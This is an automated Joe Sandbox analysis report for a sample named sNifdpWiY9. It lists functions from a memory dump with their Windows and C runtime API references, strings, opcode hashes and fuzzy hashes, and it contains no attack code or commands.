TlsSetValue.KERNEL32 ref: 00007FF75F8CD8EE
GetCurrentThreadId.KERNEL32 ref: 00007FF75F8CD8F4
CloseHandle.KERNEL32 ref: 00007FF75F8CD996
Sleep.KERNEL32 ref: 00007FF75F8CD9E8
_endthreadex.MSVCRT ref: 00007FF75F8CDA0D
TlsSetValue.KERNEL32 ref: 00007FF75F8CDA3E

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Value$AllocCloseCurrentHandleSleepThread_endthreadex
String ID:
API String ID: 3976303954-0
Opcode ID: ea43221ab5f7699fe539192792c55fb37b5c0e667665e417db95a27c9f4bd0b3
Instruction ID: b66de51c9960e904f03b77e3d2179bbbf55b448712317098f61fffed1803fc03
Opcode Fuzzy Hash: ea43221ab5f7699fe539192792c55fb37b5c0e667665e417db95a27c9f4bd0b3
Instruction Fuzzy Hash: 66415166A08BC285EB44BF22D8451F8A360EF84B94F8D4532D92E4F3A9DF3CF4519320

Function 00007FF75F8C0900 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF75F8C090B
_findclose.MSVCRT ref: 00007FF75F8C0937
_errno.MSVCRT ref: 00007FF75F8C0960
_errno.MSVCRT ref: 00007FF75F8C09D0
_errno.MSVCRT ref: 00007FF75F8C09E8

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: _errno$_findclose
String ID:
API String ID: 237123889-0
Opcode ID: d4c2707c31b7639645119803737304085e8bd4bbcb48388b01ad83bc1531672f
Instruction ID: defed10be00ded020e958f175c8b106847e512e7d02e22d44ba9810e732cb31d
Opcode Fuzzy Hash: d4c2707c31b7639645119803737304085e8bd4bbcb48388b01ad83bc1531672f
Instruction Fuzzy Hash: D2115E72D1978245FAA07E24A8553F9A150AB80774FCD0730DB7D8F2C2DE3C78A5AA31

Function 00007FF75F959030 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF75F959050
_errno.MSVCRT ref: 00007FF75F959054
fflush.MSVCRT ref: 00007FF75F95905F
_errno.MSVCRT ref: 00007FF75F959068
_errno.MSVCRT ref: 00007FF75F959080
_errno.MSVCRT ref: 00007FF75F959087

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: _errno$fflush
String ID:
API String ID: 3480992530-0
Opcode ID: 5ca159c11e492a165e49e7e4847b7b79c0e40f690da1d9bb67617af004b83946
Instruction ID: bbfd8cd051b49760568e46965654b8f84569f41d0801ce42a6f4d38dd836d8fa
Opcode Fuzzy Hash: 5ca159c11e492a165e49e7e4847b7b79c0e40f690da1d9bb67617af004b83946
Instruction Fuzzy Hash: BCF08673B0564985FB023F26AD00369A6585F54BD5F8D8430CE0C47394DF3C68868A20

Function 00007FF75F8CE691 Relevance: 9.0, APIs: 6, Instructions: 36COMMON

Download Yara Rule

APIs

longjmp.MSVCRT ref: 00007FF75F8CE6A8
TlsGetValue.KERNEL32 ref: 00007FF75F8CE6B4
CloseHandle.KERNEL32 ref: 00007FF75F8CE6DF
_endthreadex.MSVCRT ref: 00007FF75F8CE6F3
CloseHandle.KERNEL32 ref: 00007FF75F8CE703
TlsSetValue.KERNEL32 ref: 00007FF75F8CE71F

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 2d294d418596b905a4ed24bd3e2d8327b9d3b77180a0ba929c166903292c0a49
Instruction ID: b5fd184e7b6bdf2f6b292536b5ccc61fdef741219999ec86ed0704200aa4b98e
Opcode Fuzzy Hash: 2d294d418596b905a4ed24bd3e2d8327b9d3b77180a0ba929c166903292c0a49
Instruction Fuzzy Hash: DA117062A09B8282F754AF21D4143B8B7A4EF44B58F9D4035CA0D8F298EF3CB894D320

Function 00007FF75F8C0A00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

_write.MSVCRT ref: 00007FF75F8C0A16
IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF75F8B308D), ref: 00007FF75F8C0A20
GetCurrentProcess.KERNEL32 ref: 00007FF75F8C0A30
TerminateProcess.KERNEL32 ref: 00007FF75F8C0A3E

Strings

*** buffer overflow detected ***: terminated, xrefs: 00007FF75F8C0A0F

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_write
String ID: *** buffer overflow detected ***: terminated
API String ID: 483568592-381091186
Opcode ID: 51fa19411ab82c54742be8eb4a36d6b61994e59c068640f3eb8eebead229f7f5
Instruction ID: 7a13c521366accc88d22cba5bed0d80d0e98a172d7101cb5dec85121c250e09d
Opcode Fuzzy Hash: 51fa19411ab82c54742be8eb4a36d6b61994e59c068640f3eb8eebead229f7f5
Instruction Fuzzy Hash: 3CE0C240B28A8282F6043B91E8193F48221AF46381FEC0036C90E8F2E6CF1CEC068320

Function 00007FF75F8C41A0 Relevance: 7.9, APIs: 5, Instructions: 393COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00007FF75F8C435A
fputc.MSVCRT ref: 00007FF75F8C43B2

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fputc
String ID:
API String ID: 1992160199-0
Opcode ID: 5dc8d89df1790d37378db0413e4b0b2fd2a5a3db3eb330dad4d9800fb9ceb6df
Instruction ID: 8bbb71548e1c195787dc0d2550be36ba1ac34164d4918ead32a4271e2788b1e3
Opcode Fuzzy Hash: 5dc8d89df1790d37378db0413e4b0b2fd2a5a3db3eb330dad4d9800fb9ceb6df
Instruction Fuzzy Hash: 8DE1D962F183C186F761AE3594047B9A691BB54768FAC8234CE5D5FBC4CE3CF891A720

Function 00007FF75F8BCE50 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

?, xrefs: 00007FF75F8BCE65
{default arg#, xrefs: 00007FF75F8BD0D0
}::, xrefs: 00007FF75F8BD22A
], xrefs: 00007FF75F8BD39A

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: ?$]${default arg#$}::
API String ID: 0-2946519879
Opcode ID: ee5554b2d81bdab14f6412d413fb267adc60d26e5b0b1c0f9e483fb768fb14ce
Instruction ID: 591919f695f393b57e2208196c59256d73be02e9399ad82bb0f0a1367ca87f3d
Opcode Fuzzy Hash: ee5554b2d81bdab14f6412d413fb267adc60d26e5b0b1c0f9e483fb768fb14ce
Instruction Fuzzy Hash: 31E174736086C686E765AF25E4003FAA791EB15748F4C8031DB990B78ADF7DF8A1D320

Function 00007FF75F983230 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 209stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F98325F

Strings

cannot make absolute path, xrefs: 00007FF75F9832F2, 00007FF75F9833D0
basic_string: construction from null is not valid, xrefs: 00007FF75F9833B4
basic_string: construction from null is not valid, xrefs: 00007FF75F9832D8

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid$cannot make absolute path
API String ID: 39653677-136944737
Opcode ID: d34ad072b372942f945a3f858fcb43ebc4f2142a26bca6a709731bdc01d135b5
Instruction ID: 62889be618353f097772fea632824adcc8f424efd13e4fb3a228c0df3b107a47
Opcode Fuzzy Hash: d34ad072b372942f945a3f858fcb43ebc4f2142a26bca6a709731bdc01d135b5
Instruction Fuzzy Hash: 03719CA3658FC181EB15AB29D4406ADA7A1FB48BD4F988232DE9D87798CF3CD551C320

Function 00007FF75F8E8A70 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 200stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8E8ABF
memcpy.MSVCRT ref: 00007FF75F8E8B38
wcslen.MSVCRT ref: 00007FF75F8E8BC3

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F8E8B67, 00007FF75F8E8C06, 00007FF75F8E8CA6

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: memcpystrlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 339887217-2991274800
Opcode ID: ee0a15962733cd6be46b0cfe46d0529113fddc12ae4c4c692baa4271d1cf6cc2
Instruction ID: 9f06e6168720fbaa0e3b80227c8bd93e5b9ab925738763974496142ca53655db
Opcode Fuzzy Hash: ee0a15962733cd6be46b0cfe46d0529113fddc12ae4c4c692baa4271d1cf6cc2
Instruction Fuzzy Hash: 10518162B19B8581EA61AF1AE4401EEA760FB85BC4B8C0436DF5D4B7A4DF3CF561D320

Function 00007FF75F940E80 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

basic_string::erase, xrefs: 00007FF75F940F3A
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F940F41

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
API String ID: 0-2652434754
Opcode ID: a6ed99d05c4ec3ed9b6625b9c63c8241ef03aee66a7296faccbe8c03d7e2857e
Instruction ID: 1a93411c2818797872d04611b74e54b9399a95e1959f628d5a1ccb71d5db31df
Opcode Fuzzy Hash: a6ed99d05c4ec3ed9b6625b9c63c8241ef03aee66a7296faccbe8c03d7e2857e
Instruction Fuzzy Hash: 5951D362F19EC684EA11BA2AD4081EDA760BB55BD4FDC8132EF1C973A9DF2CD481C710

Function 00007FF75F8CC910 Relevance: 7.6, APIs: 5, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 4c7bb2ea5a7f13e440b759daf60424618d74bb11b2d503af90d6a8e5e9a6f5d7
Instruction ID: 68d09f7e0f70f0366b9ea5a600c15b5a124fd94bee2576e58a0a231e75356023
Opcode Fuzzy Hash: 4c7bb2ea5a7f13e440b759daf60424618d74bb11b2d503af90d6a8e5e9a6f5d7
Instruction Fuzzy Hash: 34418822B097C386FB65BE2594083F5A291EF46B54F9C8135CA1D8E3C5EE3CF8959360

Function 00007FF75F990660 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00007FF75F99068E

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: setlocale
String ID:
API String ID: 1598674530-0
Opcode ID: aff991b8307e3bcd5e05f65fa1101b974062e933480d9ca02d7098501e92c03a
Instruction ID: a1384c2c13f3e51b9d66241a33b90b92124859f71acbcde10af4c0825da29508
Opcode Fuzzy Hash: aff991b8307e3bcd5e05f65fa1101b974062e933480d9ca02d7098501e92c03a
Instruction Fuzzy Hash: D921D796B286C645EA20FF3269145FAD6456B89BD0FCC4135FE9C8F79ACE3CE1019220

Function 00007FF75F8CE994 Relevance: 7.6, APIs: 5, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32 ref: 00007FF75F8CE994
TlsGetValue.KERNEL32 ref: 00007FF75F8CE9DE
TlsGetValue.KERNEL32 ref: 00007FF75F8CEA23
Sleep.KERNEL32 ref: 00007FF75F8CEA35

Part of subcall function 00007FF75F8CD570: TlsAlloc.KERNEL32 ref: 00007FF75F8CD5AD

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Value$AllocEventResetSleep
String ID:
API String ID: 412878532-0
Opcode ID: a77759085a2798cfe768771cd9e11271f62b6a3e6ad3c4b997ad4b253fdac30c
Instruction ID: a6a6bb95660b3f9cf1f197437c34d6b7173ff33d00acdc7e1c5019c7065a9095
Opcode Fuzzy Hash: a77759085a2798cfe768771cd9e11271f62b6a3e6ad3c4b997ad4b253fdac30c
Instruction Fuzzy Hash: 0611AC22F4A7C289FA557FA5A8061F8D290AF44794F8C0430D91E4E2D6DE1C78A2A230

Function 00007FF75F8CB1A0 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF75F8CB1B6
ReleaseSemaphore.KERNEL32 ref: 00007FF75F8CB1E4
LeaveCriticalSection.KERNEL32 ref: 00007FF75F8CB1F1
LeaveCriticalSection.KERNEL32 ref: 00007FF75F8CB20B
LeaveCriticalSection.KERNEL32 ref: 00007FF75F8CB228

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CriticalSection$Leave$EnterReleaseSemaphore
String ID:
API String ID: 2813224205-0
Opcode ID: 45aee73af9dbdd27c35d892e7cd78c938b9d46a7dfe3719c238f2e86feb83cb6
Instruction ID: 6e50935f122ed998351877a64a372abe4745bd379fb2b2e88d69f320ddade9db
Opcode Fuzzy Hash: 45aee73af9dbdd27c35d892e7cd78c938b9d46a7dfe3719c238f2e86feb83cb6
Instruction Fuzzy Hash: B001D623B05A8646F7556F6ABD842B8C281AF99BF2F8C4130CE0DC6280DE2C98D68210

Function 00007FF75F8DC410 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00007FF75F8DC42E
strlen.MSVCRT ref: 00007FF75F8DC439
memcpy.MSVCRT ref: 00007FF75F8DC456
setlocale.MSVCRT ref: 00007FF75F8DC461
setlocale.MSVCRT ref: 00007FF75F8DC484

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 4902d4598cf9db4a7ffe8d6b90e375a5c80990586321391b503546af71d20fc7
Instruction ID: 1d21303d55d0ce73805b3f0ff8821bb3d074c4851cadb87d9f8abdc3ce7c8f2d
Opcode Fuzzy Hash: 4902d4598cf9db4a7ffe8d6b90e375a5c80990586321391b503546af71d20fc7
Instruction Fuzzy Hash: C1018442B3929610E969BA632D158FEC2412F4AFD4FCC8075BD0DAF786DD3CE0425310

Function 00007FF75F8DC0F0 Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00007FF75F8DC10E
strlen.MSVCRT ref: 00007FF75F8DC119
memcpy.MSVCRT ref: 00007FF75F8DC136
setlocale.MSVCRT ref: 00007FF75F8DC141
setlocale.MSVCRT ref: 00007FF75F8DC164

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: b446c8178b5d9df0beddbd8f31e3690ad96c84483da5d378e3155e5bc6b453c2
Instruction ID: b1173d44d76dd7fdd59734879a7faaa329ce777096dc74772595594413fc936f
Opcode Fuzzy Hash: b446c8178b5d9df0beddbd8f31e3690ad96c84483da5d378e3155e5bc6b453c2
Instruction Fuzzy Hash: B2017182B2969510EA29BA632D199FE86452B4AFD4ECC8075FD0D5F7C6DD38E0425310

Function 00007FF75F8CFE20 Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF75F8CFE38
OpenProcess.KERNEL32 ref: 00007FF75F8CFE4F
CloseHandle.KERNEL32 ref: 00007FF75F8CFE5D

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
